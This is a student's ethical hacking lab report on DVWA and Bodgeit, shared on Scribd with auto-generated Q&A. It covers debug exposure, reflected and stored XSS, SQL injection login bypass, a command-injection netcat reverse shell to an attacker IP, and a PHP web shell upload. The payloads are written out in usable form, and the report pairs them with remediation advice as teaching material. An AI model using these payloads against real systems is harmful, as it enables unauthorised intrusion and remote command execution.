Scribd
Upload
33 views11 pages

Ethical Hacking Challenges by Rachit Goyal

Uploaded by

Subhadeep Sinha Roy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
33 views11 pages

Ethical Hacking Challenges by Rachit Goyal

Uploaded by

Subhadeep Sinha Roy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Deakin University

Ethical Hacking
OnTrack Submission

Task 8.1P

Submitted By:
Rachit Goyal Tutor:
s222187269 Muna Al-hawawreh
2024/09/14 05:49

September 14, 2024

Produced by Doubtfire
WEEK 8 – TASK P
Answer Sheet
Your Name: Rachit Goyal

A: Hacking web Applications

1. Exploiting many vulnerabilities with web application

Task A1: First Challenge - Find Diagnostic Data

Trying to append ‘?debug=true’ parameter at the end for login page URL doesn’t
changes anything, which means that debug is not enabled for this login page

About page also has no difference, which means that about page is also having debug
option disabled.
Contact page also has debug option disabled.

In Login page we can see that adding the debug parameter at the URL shows the debug
value as ‘clear’ in the page, which means that login page has debug option enabled.

Basket page also shows the debug value which is ‘basketid = 2’ means basket id is set
to value 2, which means that basked page also has debug option enabled.
Finally the Search page also shows no different result, which means that search page
also doesn’t have any debug option enabled.

Finally, the score page shows that the following diagnostic data challenge is solved.

As debug option allows external user to view the diagnostic details of the page which
shouldn’t be visible to external users, so this vulnerability can be classified as
Security Misconfiguration Vulnerability from OWASP Top 10 list.

Task A2: Second Challenge – Level 1 - Display a Pop-Up Box

In the search page we can see that the input data is being reflected on the page after
clicking the search button, so this can be a good vector to inject Cross Site-Scripting
(XSS) payload.
I entered that payload <script>alert(“XSS”)</script> in the search box and on
submitting it pops a browser alert box containing our injected string ‘XSS’.

This alert box containing ‘XSS’ string proves that our provided payload
<script>alert(“XSS”)</script> is successfully injected in the page and executes a JS
code which pops the following alert box.
The score page showing that the challenge is completed.

To prevent this Cross Site Injection vulnerability, the developer must implement some
security measures like user input filtration, user provided data reflect restriction,
HTML encoding for sending user-controlled data at the front end & implement proper
Content Security Policy (CSP) for the browser.

Task A3: Third Challenge – Level 2 – Display a Pop-Up Box

In the application I found a registration page, where I can register a new user which
can be a vector or a Stored Cross Site Scripting Vulnerability.

Here I entered a payload in the username for registering a new user


test@[Link]<script>alert("XSS")</script>, and on registering the user it popped
the alert box containing ‘XSS’ string, which proves that it is vulnerable to a Stored XSS
vulnerability. It is a Stored XSS vulnerability because it stores the payload in the user
name of the new user & if any other user views the profile of this new user the payload
will be executed on the user’s browser making the user victim of this vulnerability.

We can see that the score page has also marked this challenge as solved.
Task A4: Fourth Challenge: login as test@[Link]

As I only know the username and not the password, I tried to perform SQL injection
attack on the login page to login as ‘test@[Link]’ user. So I entered
payload (test@[Link]' OR '1'='1) in the username field and tried to login
leaving the password field empty.

And here we can see that I successfully got access to the particular user account
without the password, which means that the application is vulnerable to SQL injection
vulnerability.

The entered payload in the username broke the SQL query at the backend. The
singlequote (‘) after the original username breaks the username string in the SQL
Query and (OR ‘1’=’1) makes the statement return always true bypassing the
requirement of password. Hence we get logged in without the need of password.
We can see that the score page marks the particular challenge as complete.

Task A5: Provide screenshots that show that you successfully finish all
these 4 challenges.

This score page shows that all the mentioned four challenges are completed.

Task A6: Creating reverse shell from vulnerable web application

I started a NetCat listener on my kali machine.


In command injection section, I entered the following payload (;/bin/[Link] -
e /bin/bash [Link] 1337 &), which includes a semicolon that signifies the end
of one command and allows to provide second command on the same line at the same
time. So our provided payload will break the ping command that is the executed at the
backend and execute a second command that is a reverse shell command, which will
send a ‘bash’ shell connection to the provided ip address ([Link]) at port 1337
which will allow the remote device to execute any system command to this device
remotely.

Executing ‘id’ & ‘whoami’ command reveals that I have the ‘_dvwa’ user privilege,
which is a restricted web server user created for DVWA application only. As an ethical
hacker I can either try to perform Privilege Escalation techniques to increase my
privilege level or I can report the particular code injection vulnerability to the
concerned authority along with its mitigation which will allow them to fix it.
Task A7: Upload web shell file and inclusion

I modified the php web shell IP & Port.

Then I uploaded the web shell and found that there was no restriction at the file upload
functionality, as it successfully uploaded the php file without any restriction.
And on executing the uploaded web shell I got the reverse connection on my NetCat
listener.

This proves that the file upload vulnerability is exploited successfully and we get to
execute system command via a reverse connection from the server.

Task C1:

This week helped me a lot in learning about various Web Applications vulnerabilities
by practically solving challenges on DVWA & Bodgeit applications. The most
important thing that I learned by this was the unrestricted file upload vulnerability
which can lead to severe threats like Code Execution by uploading a Web Shell.

The content of this module has definitely helped me to organise my thoughts and to
build a proper methodology for exploiting a web application and also helped me to
figure out the possible remediation will help me real world engagements.

Common questions

Powered by AI

A Stored XSS vulnerability on a registration page can be exploited by injecting malicious scripts as part of user data, such as in the username field. This script will get executed when another user views the profile of the affected user, making them victims by executing the payload in their browsers. It has a broader impact as opposed to reflected XSS, potentially affecting all users who interact with the contaminated data .

Ethical hackers have the responsibility to disclose vulnerabilities responsibly to the appropriate authorities or organizations, ensuring they are not exploited maliciously. They must adhere to legal guidelines and ethical standards, provide clear documentation for remediation, and respect user privacy and data protection laws when analyzing systems. Their goal should always be to aid in strengthening security measures rather than exploiting weaknesses .

Cross-site scripting (XSS) vulnerability can be demonstrated when input data is reflected on a web page, such as using a payload like <script>alert(“XSS”)</script>, which executes JavaScript code and displays an alert box. Security measures to prevent XSS include input filtering, user-provided data reflection restriction, HTML encoding for user-controlled data, and implementing a proper Content Security Policy (CSP).

Appending the debug parameter, such as '?debug=true', in a web application URL can help a tester identify if debug information is inadvertently exposed to external users. If debugging is enabled and such data is visible, it reveals sensitive diagnostic details that can be exploited by malicious users, which is considered a Security Misconfiguration Vulnerability according to the OWASP Top 10 list .

Creating a reverse shell involves exploiting a command injection vulnerability by injecting a payload that opens a connection back to the attacker's system, such as using 'nc' (Netcat) to initiate a bash shell. This allows the attacker to execute system commands remotely on the target server, potentially leading to data breaches and full control of the compromised system .

Command injection involves exploiting unvalidated input fields to manipulate or alter the execution of commands on a system. Systems become susceptible when they execute user-supplied input as commands without proper sanitization or validation, allowing attackers to append malicious commands that are executed by the server, possibly granting them unauthorized control .

The ethical hacking exercise aimed to enhance participants' understanding of various web application vulnerabilities like XSS, SQL injection, and file upload flaws by solving practical challenges. It also helped in building a structured methodology for exploiting web applications and formulating potential mitigations, which are crucial for real-world cybersecurity engagements .

A lack of restrictions in file upload functionalities allows arbitrary files, such as web shells, to be uploaded without verification of file type or contents. This can lead to remote code execution if the uploaded file is executed on the server. Prevention measures include validating file types, restricting executable file types, and scanning uploaded files for malicious content .

Documentation plays a critical role in reporting vulnerabilities as it provides a detailed account of the identified security flaws and their potential impact. Ethical hackers should approach documentation clearly and comprehensively, outlining steps to reproduce the issue, potential security risks, and suggestions for mitigation to aid developers in patching the vulnerabilities effectively .

SQL injection attacks use techniques like terminating SQL strings and appending logical statements (e.g., 'OR 1=1') that always evaluate to true. This bypasses login authentication by manipulating backend SQL queries to return valid results without valid credentials. They are possible when user inputs are not properly sanitized, allowing attackers to alter SQL commands executed by the application .

You might also like